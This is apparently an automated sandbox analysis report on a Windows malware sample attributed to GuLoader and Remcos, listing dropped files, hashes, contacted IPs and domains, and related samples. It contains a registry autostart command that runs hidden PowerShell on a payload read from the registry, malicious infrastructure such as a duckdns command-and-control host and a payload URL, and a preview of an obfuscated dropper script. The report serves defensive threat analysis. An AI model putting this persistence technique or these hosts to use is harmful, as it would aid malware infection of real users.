                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target powershell.exe, PID 1852 because it is empty
                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      TimeTypeDescription
                                      06:13:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mediates %Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)
                                      06:13:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mediates %Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)
                                      07:12:43API Interceptor44x Sleep call for process: powershell.exe modified
                                      07:13:48API Interceptor5585015x Sleep call for process: wab.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.21.60.38COPY.docGet hashmaliciousUnknownBrowse
                                      • ricohltd.top/pages/microzx.scr
                                      93Vc4lrukRxn3WG.exeGet hashmaliciousFormBookBrowse
                                      • www.peacemyanmar.com/c8ec/?i2Jx-=JbnHKQNA4AubQ4cSTRqCUjsV30iNMKVb/qiRb+TdpY0tAokv3PP5G3/qX2Zn4Kqzke2C&3fb=t8Cle8U
                                      178.237.33.50TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      Quotation.xlsGet hashmaliciousRemcosBrowse
                                      • geoplugin.net/json.gp
                                      BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                      • geoplugin.net/json.gp
                                      copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                      • geoplugin.net/json.gp
                                      payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • geoplugin.net/json.gp
                                      FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      • geoplugin.net/json.gp
                                      VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • geoplugin.net/json.gp
                                      04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      • geoplugin.net/json.gp
                                      SecuriteInfo.com.Win32.RATX-gen.9491.24773.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                      • geoplugin.net/json.gp
                                      193.222.96.21FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                  documents 53 ACH 775-53 ABM 912.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    MDU9342434.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      C3441067 Non Interventional Protocol Abstract_08Feb2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        3250391200054 - EU14303 COTTERLEY Th#U00e9 Noir Darjeeling.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          learfo55ozj01.duckdns.orgFINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          documents 53 ACH 775-53 ABM 912.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          MDU9342434.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          C3441067 Non Interventional Protocol Abstract_08Feb2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          3250391200054 - EU14303 COTTERLEY Th#U00e9 Noir Darjeeling.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          ricohltd.topFINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 104.21.60.38
                                                          04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 104.21.60.38
                                                          z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 172.67.191.112
                                                          z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 104.21.60.38
                                                          UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 172.67.191.112
                                                          COPY.docGet hashmaliciousUnknownBrowse
                                                          • 104.21.60.38
                                                          geoplugin.netHFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 178.237.33.50
                                                          TcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          Quotation.xlsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 178.237.33.50
                                                          copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 178.237.33.50
                                                          FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 178.237.33.50
                                                          VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 178.237.33.50
                                                          04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 178.237.33.50
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          SWISSCOMSwisscomSwitzerlandLtdCHFINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          pGTQLD9ukH.elfGet hashmaliciousMiraiBrowse
                                                          • 176.127.118.59
                                                          ccm9HqTuky.elfGet hashmaliciousMiraiBrowse
                                                          • 199.58.40.45
                                                          04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 193.222.96.21
                                                          wsskM49eA3.elfGet hashmaliciousUnknownBrowse
                                                          • 164.244.193.242
                                                          42EYULJ8y1.elfGet hashmaliciousMiraiBrowse
                                                          • 62.203.127.146
                                                          ATNSgLSNbG.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 164.225.115.220
                                                          sZyq3DvYmc.elfGet hashmaliciousMiraiBrowse
                                                          • 138.223.137.87
                                                          hta.htaGet hashmaliciousUnknownBrowse
                                                          • 193.222.96.114
                                                          hta.htaGet hashmaliciousUnknownBrowse
                                                          • 193.222.96.128
                                                          CLOUDFLARENETUSNew DHL Shipment Document Arrival Notice.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          hesaphareketi_1.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                                          • 104.21.15.201
                                                          e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 104.21.27.85
                                                          New Order .docGet hashmaliciousUnknownBrowse
                                                          • 172.67.134.136
                                                          orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 104.21.84.67
                                                          DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.26.13.205
                                                          Reconfirm Details.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.215.45
                                                          Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                          • 172.67.175.222
                                                          shipping docs.docGet hashmaliciousUnknownBrowse
                                                          • 104.21.74.191
                                                          ATOM86-ASATOM86NLTcnD64eVFK.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          DHL Express Courier Pickup Confirmation CBJ231025122456.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          Quotation.xlsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 178.237.33.50
                                                          copy_76499Kxls.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 178.237.33.50
                                                          payment swift.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 178.237.33.50
                                                          FINAL CMR.-Transportauftrag Nachlauf new.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 178.237.33.50
                                                          VdwJB2cS5l.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 178.237.33.50
                                                          04172024121853atr reteks.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          • 178.237.33.50
                                                          SecuriteInfo.com.Win32.RATX-gen.9491.24773.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                          • 178.237.33.50
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e19DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.21.60.38
                                                          transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.21.60.38
                                                          1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 104.21.60.38
                                                          Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.21.60.38
                                                          Factura240413227178.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.21.60.38
                                                          Price request N#U00b0DEM23000199.jsGet hashmaliciousAsyncRAT, PureLog Stealer, RedLineBrowse
                                                          • 104.21.60.38
                                                          orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 104.21.60.38
                                                          FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                          • 104.21.60.38
                                                          DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.21.60.38
                                                          G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 104.21.60.38
                                                          No context
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):965
                                                          Entropy (8bit):5.0061630437862155
                                                          Encrypted:false
                                                          SSDEEP:12:tkbOnd6UGkMyGWKyGXPVGArwY3o/IomaoHNmGNArpv/mOAaNO+ao9W7iN5zzkw7T:qbCdVauKyGX85jrvXhNlT3/7sYDsro
                                                          MD5:664DA71A99A7A7C426134240B73EF767
                                                          SHA1:33EAC84BB6B07F00593F05413A64CD8738B8A6E7
                                                          SHA-256:146F13F7649B0BB05ECAA2386D7E8DC23E5BA7B69A36919E17E994E63E9F7BA5
                                                          SHA-512:DCA9DC8FE7ED040B134D138846C0F3BA940DBCBE9883E19E704D06B8CA737E3FE4EE08AC5F98814E804E7D7716B580FBC4F7971AAD9DDC3887565FD07C4C674D
                                                          Malicious:false
                                                          Preview:{. "geoplugin_request":"154.16.105.36",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Las Vegas",. "geoplugin_region":"Nevada",. "geoplugin_regionCode":"NV",. "geoplugin_regionName":"Nevada",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"839",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"36.1685",. "geoplugin_longitude":"-115.1164",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Los_Angeles",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):8003
                                                          Entropy (8bit):4.838950934453595
                                                          Encrypted:false
                                                          SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                          MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                          SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                          SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                          SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                          Malicious:false
                                                          Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0155ffb7, page size 32768, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):15728640
                                                          Entropy (8bit):0.10807997132117475
                                                          Encrypted:false
                                                          SSDEEP:1536:GSB2jpSB2jFSjlK/gw/ZweshzbOlqVqww/ZXesozbElqVqgesKzbdzb+zb6:Ga6amUueqaJEeqv7tW
                                                          MD5:40D660B4AE3EF5A4D0EDCE7216A746FD
                                                          SHA1:4725EF64323F955EFE529DA3EE8F7DC0EA1E8626
                                                          SHA-256:D264158F0DB89FF6E751CF3697F21AD1B462A3866A737B0836194672AE24B67A
                                                          SHA-512:91044A1F5380FB982FAE2ACA51AF917C239E6A1D04798E3262037B5670EA37DBB7A7C5AA4197C8A7C7514790EE465B3183504A152F501F37729617DE898F8E22
                                                          Malicious:false
                                                          Preview:.U..... ...................':...{........................L..........{#. ....{M.h.N.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{..................................Jc|. ....{M.................... ....{M..........................#......h.N.....................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview:..
                                                          Process:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          File Type:ASCII text, with very long lines (61481), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):61481
                                                          Entropy (8bit):5.302242719886632
                                                          Encrypted:false
                                                          SSDEEP:1536:cwCVtHft7/anji7OG2BP79MU59/AmW1K7V:cJt7SnjHG2Bj9V3AmW85
                                                          MD5:030CE4392C4A8CC1B477BC3DEEACB683
                                                          SHA1:8F36406D9572E6CCF966FB69C0934C234E0617E6
                                                          SHA-256:7E9DECD5F91E30B000266DB010C2AD399BFD06F64EC43F48CA0F3BC36D69CA6C
                                                          SHA-512:3EC59592857D073EA3F59CD5279FDD4D862BA0A102DE7BB3F96DB73B64AF362C5F017802AFE78CB5299A0185F406E4FEC097C9986B74D591183AB2ABA114E4F4
                                                          Malicious:true
                                                          Preview:$Mindstehoejde=$Stelene;<#Overbears Samfundsstrukturers Koleraepidemis Udplaceringernes Orientering Neurotherapeutics Rectally #><#Herrehold tran Avenuen #><#Kadaverdisciplinen Fyraabs Bryssels Hmorroiders Runt #><#Forfulgtes Jamwood Clarenceux #><#Teonanacatl Kroen Barbariseringerne Hingeless Partipolitik #><#Unadmirable vense gedeosts Quoin Himpegimpe Unfundamentally Hiccough #><#Donnaer Tilrettelgges Floccus Bivognenes #><#Fumy Zincifying Lapactic univalve Rutinearbejde Skytsaand Cedulas #><#Opskreknivene Svampede Crystallogy Cyklet Eftermiddags #><#Kunstvrkernes Ellipticalness Forretningsfolk #><#Bevogter Weirs Ceaselessly Befrielsesorganisation Omened #><#Tympanic Termograferet Yup Faithful #><#Scrumptious Onymous Bevisene Fuguist Rediffusing Panteretten Dativen #><#thoracopagus Backinger Leukemia Ventepositionerne Afskedsbrevene Hksaksen norie #><#Fedtefadets Sovepudes camorrista Petasuses Roberto #><#Phagosome Laveer mediastinitis Tandemise Rivningernes #><#Bltfiskeriet Bertelin
                                                          Process:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):583528
                                                          Entropy (8bit):1.0249509792288733
                                                          Encrypted:false
                                                          SSDEEP:768:MKlDYoi4bR/umx0xHe+Z5zr5KG6RHKf0MBnc9eoz/vh7un9OpOr2iRWAtbWnUelJ:M3KUzBbeJN0AtMmKBdiQiwjEabLL15B
                                                          MD5:C3921A40547297639160FF791C646E79
                                                          SHA1:EF4133C604B8160A9562F5F734054FB26D1E6D23
                                                          SHA-256:1B4DD3B525A74AF08166BF0793C169BB5769BEC328CD5415053EA899CD2973DE
                                                          SHA-512:CF2F68A1F57690A7446F1D76527E558FF2BAAD0C77537E3579EBE7FD9852E14EEE533B54A287D3728F5EDDE5C6C1DE1AA19A4AFB89FC6A09566A5923486AD725
                                                          Malicious:false
                                                          Preview:.J.................................$.....................................[...........................................................................................H........................................................7..................................................q.J........................l...................q..........................................................................................................L..........................O...8................................g.........;..................>......u......!..F.....................................................@.........................N.....l.......................................@.................A.........................z......................&.............................................................D.....................p......................................x............................................................2.............^.........................................G............................
                                                          Process:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):259130
                                                          Entropy (8bit):1.0295127854772248
                                                          Encrypted:false
                                                          SSDEEP:768:4Uk7S6WKjfYCXfsYmLqQ6w1Hj69IMRBKoEjR4525ZyzAVFSWJPcO3+pyYLwwdhei:N5l/GVXeHN
                                                          MD5:ABA7992ED97E03F3BE41BF450C4FF558
                                                          SHA1:EC577460A2B5788E6A32C8D8281B17D3C6175092
                                                          SHA-256:C7BBCF0AEB9DE2231C1D51E8BACFCCD7B4B19E1417A7B9AD6E5CC426FA9F85E7
                                                          SHA-512:A90778F1E332FAC284352DC3F0CEA45D7C115B3807C799F6A6B7AF6DE513745BE5C44D0A9EB42E2B968D5B1111B48EB7882B27F2DFCE08B7D172CD65F47C2256
                                                          Malicious:false
                                                          Preview:...............................................................................t........J...........p......................................................................n..........................f.............................#................................................................K.........................................................................0.........................a........................................n...................................1.................I.............................................................................>................................................................................~.......................................x..].............................................................................................a................1................................................*..........................6..........................................7....D.........................................................................
                                                          Process:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):258250
                                                          Entropy (8bit):1.0353917579133594
                                                          Encrypted:false
                                                          SSDEEP:768:TrFBTWEMvO9XZDTKtC1F6ahQEpWKhXsGLH4VVgzw8/nPXVccOVF56824gbrbuyco:JMWvfXBnPp65MF
                                                          MD5:2992ADE942D72BA9CAF9704896ABC31C
                                                          SHA1:B0AF5EADEF4E212292007B571BEE2034326B7BF3
                                                          SHA-256:9F7253B41623DC8F4635CC2712FEB9BCB8526256838F5EF088048A9FEA5E2FB6
                                                          SHA-512:8366CF7F264C237F9FCF359EC1D2B1721B9438C6AD54967ECABEB2DCC0F1D02A7C729422F99043CFB83F9B88317C08C4D531D95B43C865183AFBCE7CE0C1E1B1
                                                          Malicious:false
                                                          Preview:.O......................4.........&....................................~................................................................................b............>...............................................................................$............................................................................:......................H...........r............#....:....................................+.........................(.......................................x................................................................................................./......................._......an...........*.....b..............................p...@.............q......d........................i.............................................j................................................q.........................................................................................W........5.G................H...-..............T;.....r.....................................................
                                                          Process:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):878893
                                                          Entropy (8bit):1.0262385306478936
                                                          Encrypted:false
                                                          SSDEEP:1536:n7sJTz1GINWwKnicuWDZdorbSVFAIpBfeZJG4bJNpGL64nxC:nc1/mnigDZdAmFbv47LpGH
                                                          MD5:9B2E36BF826DF2F8DD52FE5CD6660240
                                                          SHA1:10BA7A27ADCAACC08CBFDEC998AB90FC3435A419
                                                          SHA-256:CB2106F5D4B252E92425B882E52E1D4AE3A8CF7FBB6E589FF892510E54C2541E
                                                          SHA-512:12E792815D5930EE800242553381A7AFCA28B6D18229D8B5AA56AE5BE849685001469345C61498D174F439B8FFAEBDEA18B467EC14067468CE1AD29A374196B8
                                                          Malicious:false
                                                          Preview:.........................................................................................................................................................................................................C.........c............................i............................................?................................................................................h........................................8.................................................................................@......(............................"....................................b..................................................................................................................................C....>.......................................................................................................................................................................m........................................1........................_............#...................................h.................
                                                          Process:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):533139
                                                          Entropy (8bit):1.0222842965032446
                                                          Encrypted:false
                                                          SSDEEP:768:Az/DTHr2KZZhw74n+GN09ZBWHMyFcfWW9/DSeh0SfdeN47xicYDgOvpwWnopqWQh:CJuF9uiVZ5Eh7aY+O
                                                          MD5:53C65FB03783103C9CCABCB36593B3D7
                                                          SHA1:23E63DB5B2D2709CB7AF686A86574014B3B8B7F4
                                                          SHA-256:6207761AB226F63B305B155BC2B94D796083B08A74560C4570EBAC81A6F156FB
                                                          SHA-512:22A6D1860177CCBF52631A51EE9991951307C439FC04B9380DF9C2AD6F78D1B0683DB393F1C2391C9E49793ACE346116460F4B0C8DFD3400BDD58B90D69AA692
                                                          Malicious:false
                                                          Preview:...............i.............................................n........................................................................................................................>....................................Fl........'...>....w......h.....................................................\....................A...............................................................m...............................................z..................@........~.........4..........................Q..........................................................u.........}L...........s.........................................................%........../...3...............B.....3......................................._.............................&.......................9................................V.......................0.........f...Q...................................................................................8.....................................7......4...............................
                                                          Process:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):409
                                                          Entropy (8bit):4.241897102605509
                                                          Encrypted:false
                                                          SSDEEP:6:3ogxJohHFKWWRgDNtOA7V+JWTdPM4GtqmyFFzwAaJSNwSdM33u0UX5CGTurhWP:3YHWRc8Y+JJJFynzwAanqS3ulgwIw
                                                          MD5:4A7E7B2883FE94C82222A7530E346283
                                                          SHA1:266C2D8A64757575DBD91E73838F133EFF1BF08F
                                                          SHA-256:C5FDE5EB583497787645D7CA6A2414DA778625ED7EDB0CE6A11B999A231C77CD
                                                          SHA-512:4839F5C86CB820EEED6B0C933593E6B72D01273DABC20AA449E9FA87453BFA37B3C3A45350ABDD0223303ED600649DCA8F0DD547F3D4DDEB218FD93B18019430
                                                          Malicious:false
                                                          Preview:voldfrtes vocalics betrkke kortvarigt nervules cindersbanen chirm overstregningens caviler quetsch dyttende..femkroners sherifs jvnfrelser dekoderen,carval storstrmsbroens shiva champagneprop,ergometers morits plinther coseismic uddrivningens bettine harbours conoscope..handelen totures terrierne rebukes donnas soddenly unrobes..aplotomy doteringen aandsretninger digamist opsoeg gennemloebe traditionalist.
                                                          Process:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):321311
                                                          Entropy (8bit):1.0233765320687445
                                                          Encrypted:false
                                                          SSDEEP:768:AqxTt4EYevkKSa6EC3IhYMR/WPQztmMkIaDORVF/RNtrNYDgAuYljlXIs0QaDptH:5TKiAR4h7UnZEt/Gj
                                                          MD5:4B30B86789FC8932D182149A199D9BC1
                                                          SHA1:D90C77DEA11DBC2ADAC65D7A87F6CA1B983D61AB
                                                          SHA-256:407069DE71FF4ED64F6FD439B05006DF0BEEFB2319DD60A0F6153E43624B6E92
